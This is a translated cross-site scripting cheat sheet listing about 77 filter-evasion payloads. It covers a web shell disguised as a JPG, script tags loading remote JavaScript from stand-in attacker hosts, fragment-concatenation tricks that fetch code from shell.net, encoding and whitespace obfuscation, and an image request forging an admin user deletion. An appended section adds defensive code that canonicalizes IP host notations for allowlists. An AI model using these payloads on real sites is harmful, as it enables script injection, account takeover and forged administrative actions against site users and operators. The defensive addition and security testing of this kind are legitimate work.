Cross-site image shell
XSS cross-site code: <script>alert("")</script>

Put the code on the first line of the web shell, save the shell as a JPG image file, and the shell is still executed when the image-format file is requested.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag without semicolon or quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (charcode calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the word "javascript"
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the word "javascript"
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around a character limit (all fragments must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null characters are basically ineffective in China, since there is nowhere to make use of them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double opening brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) Stylesheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG with VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META with a linked URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters inserted before the URL (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an opening angle bracket and a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
expression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) ActionScript inside Flash can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image file and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP address as a decimal integer
<A HREF="http://3232235521">XSS</A>

(71) IP address in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP address in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting http:
<A HREF="//www.google.com/">XSS</A>

(75) Omitting www
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
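Items 70 to 76 show that one host can be written as a decimal integer, dotted hex, dotted octal, a mixed form, a scheme-relative URL or a name with a trailing dot, so any allowlist or blocklist that compares the raw host string is bypassed by re-spelling the address. The following is an added defensive example, not code from the original post: it canonicalizes the host part of a URL following the IPv4 parsing rules of the WHATWG URL Standard (the behaviour browsers implement), so every numeric spelling collapses to one dotted-quad and a domain name to one lowercased form, and the policy compares that canonical value. The function names and the allowlist contents are constructed for this example; it takes the host already split out of the URL, so the whitespace tricks of item 73 are assumed to have been stripped by the URL parser first.

```javascript
// Added example (not from the original post): canonicalize the host part of a URL
// before comparing it against a policy, so the IP-notation tricks in items 70-76
// all collapse to the same dotted-quad.

// Parse one dotted component as the WHATWG URL IPv4 parser does:
// "0x" prefix = hex, leading "0" = octal, otherwise decimal. NaN when not numeric.
function parseIpv4Part(part) {
  let radix = 10;
  let digits = part;
  if (/^0x/i.test(part)) {
    radix = 16;
    digits = part.slice(2);
  } else if (part.length > 1 && part[0] === '0') {
    radix = 8;
    digits = part.slice(1);
  }
  if (digits === '') return radix === 10 ? NaN : 0;   // "0x" alone counts as 0
  const allowed = { 10: /^[0-9]+$/, 16: /^[0-9a-f]+$/i, 8: /^[0-7]+$/ }[radix];
  return allowed.test(digits) ? parseInt(digits, radix) : NaN;
}

// Returns the dotted-quad string for any numeric host form, the lowercased name
// (trailing dot removed) for a domain, or null when the host is malformed.
function canonicalizeHost(host) {
  let h = String(host).toLowerCase();
  if (h.length > 1 && h.endsWith('.')) h = h.slice(0, -1);   // item 76: absolute DNS name
  const parts = h.split('.');
  if (parts.some(p => p === '')) return null;
  const values = parts.map(parseIpv4Part);
  if (values.some(Number.isNaN)) return h;                    // not all numeric: a domain name
  if (values.length > 4) return null;
  const last = values[values.length - 1];
  // Every part except the last must fit in one byte; the last one fills the remaining
  // bytes (this is what lets "3232235521" and "1.2.3" parse as IPv4 addresses).
  for (let i = 0; i < values.length - 1; i++) {
    if (values[i] > 255) return null;
  }
  if (last >= 256 ** (5 - values.length)) return null;
  let address = last;
  for (let i = 0; i < values.length - 1; i++) {
    address += values[i] * 256 ** (3 - i);
  }
  return [address >>> 24, (address >>> 16) & 255, (address >>> 8) & 255, address & 255].join('.');
}

// Policy check: compare the canonical form, never the raw string, against the allowlist.
function isAllowedHost(host, allowlist) {
  const canonical = canonicalizeHost(host);
  return canonical !== null && allowlist.includes(canonical);
}

// Constructed demonstration: every spelling of 192.168.0.1 from items 70-72 matches
// the allowlist entry, while the neighbouring address 192.168.0.2 does not.
const ALLOWLIST = ['192.168.0.1', 'www.google.com'];
const HOSTS = ['3232235521', '0xc0.0xa8.0x00.0x01', '0300.0250.0000.0001', 'www.google.com.', '3232235522'];
for (const h of HOSTS) {
  console.log(h, '->', canonicalizeHost(h), isAllowedHost(h, ALLOWLIST) ? 'allowed' : 'rejected');
}
```

A host that is only partly numeric (for example "google.com") is returned as a domain name, and a malformed numeric host (a component above 255, or more than four components) is rejected outright rather than passed through, so the policy never compares against a string the browser would have resolved differently.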